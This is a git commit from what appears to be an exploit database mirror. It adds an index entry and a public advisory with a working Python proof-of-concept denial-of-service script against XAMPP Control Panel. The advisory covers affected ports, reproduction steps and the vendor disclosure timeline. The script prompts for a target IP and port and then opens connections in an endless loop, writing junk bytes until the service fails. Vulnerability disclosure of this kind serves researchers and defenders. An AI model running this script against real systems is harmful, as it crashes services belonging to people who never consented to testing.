DB: 2016-12-26
1 new exploits XAMPP Control Panel - Denial Of Service
This commit is contained in:
parent
560fb055c7
commit
af66bcd9e5
2 changed files with 150 additions and 0 deletions
|
@ -5329,6 +5329,7 @@ id,file,description,date,author,platform,type,port
|
||||||
40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
|
40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
|
||||||
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||||
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||||
|
40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
|
Can't render this file because it is too large.
|
149
platforms/windows/dos/40964.py
Executable file
149
platforms/windows/dos/40964.py
Executable file
|
@ -0,0 +1,149 @@
|
||||||
|
'''
|
||||||
|
[+] Credits: John Page (hyp3rlinx)
|
||||||
|
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
|
||||||
|
[+] Source:
|
||||||
|
http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt
|
||||||
|
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
=====================
|
||||||
|
www.apachefriends.org
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===================
|
||||||
|
XAMPP Control Panel
|
||||||
|
|
||||||
|
|
||||||
|
XAMPP is a free and open source cross-platform web server solution stack
|
||||||
|
package developed by Apache Friends,
|
||||||
|
consisting mainly of the Apache HTTP Server, MariaDB database, and
|
||||||
|
interpreters for scripts written in the PHP
|
||||||
|
and Perl programming languages.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
=====================
|
||||||
|
Memory Corruption DOS
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
N/A
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Details:
|
||||||
|
=====================
|
||||||
|
|
||||||
|
XAMPP Control Panel crashes with access violation when writing junk bytes
|
||||||
|
into several different ports e.g.
|
||||||
|
|
||||||
|
Tested following ports / versions:
|
||||||
|
|
||||||
|
(MySQL) 3306 v3.2.2
|
||||||
|
(Tomcat) 8080 (XAMPP v3.1.0)
|
||||||
|
(FileZilla) 21
|
||||||
|
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
|
||||||
|
|
||||||
|
It is not that XAMPP Control Panel is listening on some port, however
|
||||||
|
memory corruption and Denial Of Service does
|
||||||
|
occur when you constantly write junk into, for instance, the MySQL, Tomcat,
|
||||||
|
FileZilla, Mercury Mail listening ports.
|
||||||
|
|
||||||
|
|
||||||
|
1) Launch XAMPP control panel
|
||||||
|
2) Run exploit script against some ports like 3306, 79, 105 (Mercury mail)
|
||||||
|
with Apache running and or Tomcat
|
||||||
|
|
||||||
|
Target different services and port combinations to reproduce.
|
||||||
|
|
||||||
|
Important to note is that neither MySQL or Apache itself crash, it IS the
|
||||||
|
XAMPP Control Panel that crashes with Access Violation.
|
||||||
|
|
||||||
|
|
||||||
|
Tested Windows SP1
|
||||||
|
|
||||||
|
|
||||||
|
POC Video:
|
||||||
|
https://vimeo.com/196938261
|
||||||
|
|
||||||
|
|
||||||
|
Exploit code(s):
|
||||||
|
===============
|
||||||
|
'''
|
||||||
|
|
||||||
|
import socket
|
||||||
|
|
||||||
|
print "XAMPP Control Panel DOS"
|
||||||
|
print "Discovery: John Page (hyp3rlinx)"
|
||||||
|
print "ApparitionSec"
|
||||||
|
print "hyp3rlinx.altervista.org\r\n"
|
||||||
|
|
||||||
|
IP = raw_input("[IP]> ")
|
||||||
|
PORT = raw_input("[PORT]> ")
|
||||||
|
|
||||||
|
arr=[]
|
||||||
|
c=0
|
||||||
|
while 1:
|
||||||
|
try:
|
||||||
|
arr.append(socket.create_connection((IP,PORT)))
|
||||||
|
arr[c].send("DOOM")
|
||||||
|
print "Die!"
|
||||||
|
c+=1
|
||||||
|
except socket.error:
|
||||||
|
print "[+] Done! "
|
||||||
|
raw_input()
|
||||||
|
break
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Disclosure Timeline:
|
||||||
|
=======================================
|
||||||
|
Vendor Notification: November 1, 2016
|
||||||
|
Vendor acknowledgement: November 4, 2016
|
||||||
|
Vendor released Fix : December 22, 2016
|
||||||
|
(NO public mention as of the time of this writing)
|
||||||
|
December 24, 2016 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
================
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no
|
||||||
|
warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory,
|
||||||
|
provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in
|
||||||
|
vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the
|
||||||
|
information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author
|
||||||
|
prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere.
|
||||||
|
|
||||||
|
hyp3rlinx
|
||||||
|
'''
|
Loading…
Add table
Reference in a new issue